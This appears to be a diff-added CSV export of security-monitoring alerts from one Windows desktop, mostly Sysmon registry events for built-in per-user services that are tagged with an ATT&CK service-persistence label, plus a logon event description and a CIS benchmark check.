+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:22.398",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 12:33:20.155",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.855768500Z"",""eventRecordID"":""617"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.836\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.836"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.836 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: 
HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.855",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.650980300Z"",""eventRecordID"":""611"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.842",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.650491500Z"",""eventRecordID"":""610"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3f376\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3f376\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3f376\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:33:19.833",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.649568700Z"",""eventRecordID"":""609"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.812",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.649350200Z"",""eventRecordID"":""608"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.794",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.647326400Z"",""eventRecordID"":""607"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3f376\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.755",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.646998800Z"",""eventRecordID"":""606"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.715",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.643779300Z"",""eventRecordID"":""605"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 12:33:19.698",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.641786800Z"",""eventRecordID"":""604"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.687",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.640512700Z"",""eventRecordID"":""603"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.663",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.640301300Z"",""eventRecordID"":""602"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.636",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.639008900Z"",""eventRecordID"":""601"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.630",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.638344600Z"",""eventRecordID"":""600"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3f376\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3f376\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3f376\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:33:19.609",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.635372900Z"",""eventRecordID"":""599"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.575",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.634860900Z"",""eventRecordID"":""598"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: 